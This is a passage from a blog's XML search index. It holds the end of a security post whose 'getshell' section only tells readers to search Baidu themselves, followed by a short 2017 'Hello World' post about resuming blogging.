<h3 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">自己百度吧</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[Hello World]]></title>
<url>http://phpplay.github.io/2017/03/14/hello-world/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><pre><code>时隔一年,又开始写blog了,这次能坚持多久?
</code></pre>]]></content>
</entry>
</search>